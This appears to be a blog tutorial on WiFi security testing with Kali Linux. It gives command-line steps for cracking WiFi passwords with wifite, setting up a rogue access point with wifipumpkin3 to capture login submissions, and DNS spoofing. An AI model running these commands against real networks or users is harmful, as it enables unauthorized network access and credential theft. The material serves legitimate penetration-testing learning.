Getting Started with WiFi Security Testing

Learn the steps on how to get started with WiFi security testing using Kali Linux and a NIC.

fairycn

Apr 22, 2023 • 7 min read

This image was created by AI under the art direction of Luciano Koenig Dupont A.K.A Lucky as part of the Advertindians project that celebrates the indigenous culture and human diversity through a series of images that combine advertising, fashion, and cultural elements. Using artificial intelligence, it seeks to achieve an attractive aesthetic, while respecting and admiring the visual culture of indigenous peoples.

Learn the steps on how to get started with WiFi security testing using Kali Linux and a NIC.

Let's dive in!

Preparation

To begin WIFI security testing, we will start preparing by gathering the following materials as seen below.

1) Obtain an external network card: Netcore NW392

2) Look for its chip information, which should look similar to the picture below.

This device currently requires manual driver installation.

3) Input the following commands in the Kali Linux command-line to manually install drivers.

apt install realtek-rtl88xxau-dkms // need to enter y to continue installation

*Note: Due to the slow network speed when it has reached 69% and 85% of progress, you may have to be patient and wait for an extended period of time.

4) Reboot the machine after the installation is complete with the reboot command.

Wireless network card status query

In this next section, we will cover how to view wireless network information.

1) First, input the following command iwconfig in the Kali Linux command-line
to view wireless network information (as pictured below).

The following below explains what Mode indicates:
When the working mode shows as Monitor, that means it can listen to the accessory wireless device communication.
When the working mode shows as Managed (as seen in screenshot above), that means it can connect to attached wireless devices.

2) To change the working mode of the NIC input the following command:
iwconfig [NIC name mode] [working mode; Monitor or Managed]

Examples of common modes for testing are as follows:

iwconfig wlan0 mode Managed
iwconfig wlan0 mode Monitor

Practical explanation

Crack WIFI password using wifite tool for testing

In this section, I will cover how to crack a WIFI password using the wifite tool.

1) Obtain the new version of wifite here: https://github.com/kimocoder/wifite2
2) Next, follow the steps as pictured below in your command line to install wifite.

$ git clone https://github.com/kimocoder/wifite2.git
$ pip3 install -r requirements.txt //install dependencies, no need to execute this command in kali system under normal circumstances (dependencies are satisfied)
$ cd wifite2
$ sudo . /wifite.py
$ sudo python3 setup.py install //install to system options

Note: The most recent Kali built-in wifite version is not new to GitHub (root privileges are required to run the wifite command for attack operations).

3) Run the -h argument to display wifite help information.

4) Enter the -h -v parameter to run to display more help information.

This output allows you to view the default password package save path
GitHub --- current path wordlist-probable.txt

Kali ---usr/share/dict/wordlist-probable.txt

Default attack method.

5) Run wifite with root privileges without parameters. Input ./wifite.py in the command line.

Detect the wireless card of the running device and change the mode of the wireless card to monitor (to detect nearby WIFI communication).

6) Start automatic scanning of attached WIFI devices, until you enter Ctrl+c to pause

7) Enter Ctrl+c to pause the scan and enter the corresponding parameters according to the purpose of the test to start WIFI password cracking

8) Crack the specified device: enter the corresponding serial number of WiFi
All devices: input "all" parameter

Attack the specified device.

9) You can use the -e parameter plus the device essid information to specify the operation.

Commonly used combination of parameters explained.

Note: Here is the command executed under the path of wifite folder
sudo . /wifite.py --kill -i wlan0 -mac -pow 50 --dict /password.txt

Kill conflicting processes using the wlan0 NIC with mac address randomization enabled and then attacking WIFI devices with signal strength greater than or equal to 50 using the specified dictionary

For a spoofing attack, use wifipumpkin3 tool for testing

GitHub: https://github.com/P0cL4bs/wifipumpkin3
Online installation manual: https://wifipumpkin3.github.io/docs/getting-started#installation

Here is an example of how to install the wifipumpkin3 tool for testing.

sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install

Note: scapy warning issue

Update scapy version
https://github.com/secdev/scapy

Create a WiFi

set interface wlan0
# Set the name of the access point to be created
set ssid TestWIFI
# Set noproxy plguin
set proxy noproxy
# Ignore all logs from the pydns_server
ignore pydns_server
start

//pumpkinproxy - Proxy for intercepting network traffic for the TCP protocol.
//captiveflask - Allows to block users from accessing the internet until they open a login page.
//noproxy - Runs proxy-less redirected traffic

Search for the created wifi

Visit the test URL and enter the account password to log in and test
http://testphp.vulnweb.com/login.php

Convenient startup script

Save the commands from the previous test to a file with the pulp suffix
Load with the --pulp parameter

Proxy mode settings

Default pumpkinproxy // proxy available for intercept mode
Turn on the proxy plugin

Turn off the proxy plugin

captiveflask proxy mode //specific page that pops up after connecting to WIFI

Captured submissions

DNS hijacking

set interface wlan0
set ssid TestWIFI
set proxy noproxy
ignore pydns_server
use spoof.dns_spoof
set domains wifitest.com
set redirectTo 192.168.70.133
back
start